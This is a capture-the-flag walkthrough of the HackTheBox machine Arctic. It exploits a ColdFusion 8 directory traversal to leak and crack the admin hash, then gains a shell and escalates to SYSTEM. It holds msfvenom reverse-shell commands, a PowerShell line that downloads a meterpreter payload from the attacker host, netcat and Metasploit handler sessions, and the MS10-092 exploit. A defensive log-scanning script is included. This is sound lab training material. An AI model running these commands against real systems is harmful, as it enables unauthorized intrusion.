This is a writeup of Arctic, a Windows box rated easy on HackTheBox, which has Adobe ColdFusion as its primary service. The exploitation essentially leverages enumeration and two CVEs: the Adobe ColdFusion Directory Traversal and MS10-092. Interestingly, it does require us to escalate privileges to obtain the root flag.
Before we start, I want to let you know that this particular box has some serious latency issues. It took about 20-30 seconds to serve each request, and it sadly kept dying on me. I had to reset it a few times, so you might notice different IP addresses for the box in the included screenshots and commands.
Arctic Writeup: Scanning Network
Let’s start off by running an obvious nmap scan.
# Nmap 7.70 scan initiated as: nmap -sC -sV -oA nmap.basic 10.129.156.45
Nmap scan report for 10.129.150.85
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
So, the scan has returned three open ports: 135, 8500 and 49154. Of these, 135 and 49154 are running the basic RPC service. Let's first explore port 8500, as it seems interesting.
Arctic Writeup: Enumeration
Starting off with the browser view of port 8500, we find two directories, namely CFIDE and cfdocs. Enumerating further, we have plenty of files and directories in here, but administrator sounds worthy enough to be explored first 😉
Okay, so we have the login page of “ColdFusion 8” running here, with the username field locked so that only a password can be entered.
You can check out this link to learn more about Adobe’s ColdFusion.
I also googled the changelog for ColdFusion 8 and found out that there was only a single sub-version of version 8, i.e. “ColdFusion v8.0.1”. Thus, we can be sure that we are dealing with ColdFusion v8.0.1 here. It's always wise to do version enumeration; you never know where it may help you out 😉
I did try a few default passwords like “admin”, “password”, etc. but had no luck with them. And I couldn't afford to brute-force my way in because this box took a freaking 30 seconds to respond to every request.
Arctic Writeup: Exploitation
So, better to search for exploits available for ColdFusion 8. I found this Directory Traversal exploit on ExploitDB.
Arctic Writeup: Using the Directory Traversal Exploit
Modifying the URL as per the instructions in the exploit:
The exploit worked and revealed a password hash:
Password Hash --> password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
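On the defensive side, this class of request is easy to spot in web server logs once the target is decoded properly. The following is an added example by the editor, not part of the original writeup: it scans constructed Common Log Format lines (the client, timestamps, the `file` parameter name and the file names are all made up) for single-encoded, double-encoded and backslash `..` segments and embedded NUL bytes in any path or query value, and reports the offending requests.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not captured from the box); line 2 has dots in a name but no traversal.
SAMPLE_LOG = """\
10.10.14.52 - - [01/Jan/2021:10:00:01 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120
10.10.14.52 - - [01/Jan/2021:10:00:02 +0000] "GET /cfdocs/release..notes.htm HTTP/1.1" 200 812
10.10.14.52 - - [01/Jan/2021:10:00:03 +0000] "GET /CFIDE/administrator/enter.cfm?file=..%2F..%2F..%2Fconstructed.properties%00en HTTP/1.1" 200 4100
10.10.14.52 - - [01/Jan/2021:10:00:04 +0000] "GET /CFIDE/administrator/enter.cfm?file=%252e%252e%255c%252e%252e%255cconstructed.txt HTTP/1.1" 200 4100
"""

# Groups: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing, so %252e%252e becomes '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_reasons(target):
    """Return the reasons a request target looks like path traversal ([] if clean)."""
    reasons = []
    path, _, query = target.partition("?")
    # Inspect the path and every query value: the traversal may sit in any parameter.
    pieces = [path] + [kv.partition("=")[2] for kv in query.split("&") if kv]
    for piece in pieces:
        decoded = decode_fully(piece).replace("\\", "/")
        if "\x00" in decoded:
            reasons.append("NUL byte in decoded value (extension-truncation attempt)")
        if any(seg == ".." for seg in decoded.split("/")):
            reasons.append(f"'..' segment after decoding: {decoded!r}")
    return reasons


def scan_log(text):
    """Return (client, target, reasons) for every parsable line with at least one reason."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        reasons = traversal_reasons(m.group(3))
        if reasons:
            hits.append((m.group(1), m.group(3), reasons))
    return hits


if __name__ == "__main__":
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(client, target, reasons)
```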
Analyzing the password hash: using a hash identifier website, I found out that the hash type is SHA1.
Trying a few online SHA1 lookup sites, I was able to crack the hash using this site:
password = happyday
Great! Now, after trying the password obtained, we are logged in as “Administrator”.
Arctic Writeup: Getting a reverse shell
There are a hell of a lot of things to do here, but what's of use to us is the “Scheduling Tasks” service under the “Debugging & Logging” section, which ColdFusion offers and which allows us to upload files.
I will be creating a reverse shell in JSP using msfvenom to upload. That's because, after I took a little hint from the walkthroughs, I learned that ColdFusion serves and runs .jsp files.
Creating the .jsp reverse shell using msfvenom (fill in your own LHOST and LPORT values):
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=8500 > shell.jsp
Payload size: 1500 bytes
Let’s copy this reverse shell file into our apache web server directory i.e. /var/www/html/
$ cp shell.jsp /var/www/html/
and start the apache server on our machine.
$ service apache2 start
Checking the localhost webpage to ensure that the file “shell.jsp” is being served.
Now, let's schedule a task in ColdFusion to visit the “shell.jsp” file on our server and do the magic 😉
I will add the URL of our server where the “shell.jsp” file resides, i.e. http://10.10.14.52/shell.jsp, and will also specify the destination path on the box where the file should be saved (inside the CFIDE directory).
Once the task is scheduled, run it!
It will take a while and then give the message “This scheduled task was completed successfully.”
Verifying that we have successfully uploaded “shell.jsp” to the CFIDE directory: shell.jsp is there.
Let's open up listening port 8500 on our machine (as 8500 was the port we set as LPORT in the msfvenom command):
$ nc -nlvp 8500
listening on [any] 8500 ...
Let's now visit the URL of the “shell.jsp” file on the box.
Yay! We have a reverse shell!
Arctic Writeup: User Flag
On running the command “whoami” we find out that the current user is “tolis”.
Voila 🎉 We have the user flag. Now we've got to escalate our privileges.
Arctic Writeup: Root Flag
Getting a reverse meterpreter shell
Now, because this is just a plain reverse shell, let's try getting a meterpreter session on the box.
Let's create a Windows reverse meterpreter payload using msfvenom:
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=8500 -f exe > met_shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
And copy it to the web server directory so that it is hosted on our server.
$ cp met_shell.exe /var/www/html/
Now let's run this PowerShell command in the plain reverse shell we obtained earlier:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.52/met_shell.exe','meterpreter.exe')"
So, now we have “meterpreter.exe” on the box.
Let's use “exploit/multi/handler” in Metasploit:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.52
LHOST => 10.10.14.52
msf5 exploit(multi/handler) > set LPORT 8500
LPORT => 8500
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.52:8500
Now let's run the “meterpreter.exe” file on the box using our current shell.
And there we have our reverse meterpreter shell 🙂
PS: We are running an x86 meterpreter session on an x64 box.
I also tried the command “getsystem” to gain root, you know, just in case 😉 but it didn't work lol
Now, let's run the “local_exploit_suggester”. This module basically suggests local exploits that the box may be vulnerable to.
meterpreter >
Background session 1? [y/N]
msf5 exploit(multi/handler) > search suggest

Matching Modules

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/server/icmp_exfil                                       normal  No     ICMP Exfiltration Service
   1  exploit/windows/browser/ms10_018_ie_behaviors    2010-03-09       good    No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
   2  exploit/windows/smb/timbuktu_plughntcommand_bof  2009-06-25       great   No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow
   3  post/multi/recon/local_exploit_suggester                          normal  No     Multi Recon Local Exploit Suggester
   4  post/osx/gather/enum_colloquy                                     normal  No     OS X Gather Colloquy Enumeration
   5  post/osx/manage/sonic_pi                                          normal  No     OS X Manage Sonic Pi


msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run
OK, so we have some interesting results.
Also, because we are running an x86 meterpreter session on an x64 box, we should additionally migrate our meterpreter session into an x64 process and re-run the “local_exploit_suggester” module, as the results may differ.
Arctic Writeup: Migrating meterpreter shell
So, let's migrate our x86 meterpreter session into an x64 one.
Let's choose a process with x64 architecture. I will be avoiding “powershell.exe” because using it may cause that process to die, and if “powershell.exe” dies, our meterpreter session dies with it.
Let's use “jrun.exe” with “pid = 1140”.
So, now we have successfully migrated into an x64 meterpreter session. Let's re-run the “local_exploit_suggester”.
Comparing the two results from the x86 and x64 sessions, we can see that “exploit/windows/local/ms10_092_scelevator”, which is ideal for escalating privileges, is common to both. Let's try that exploit.
Awesome! 🥳 We are NT AUTHORITY\SYSTEM. Here's the root flag.
Until the next box, check out other intriguing writeups here.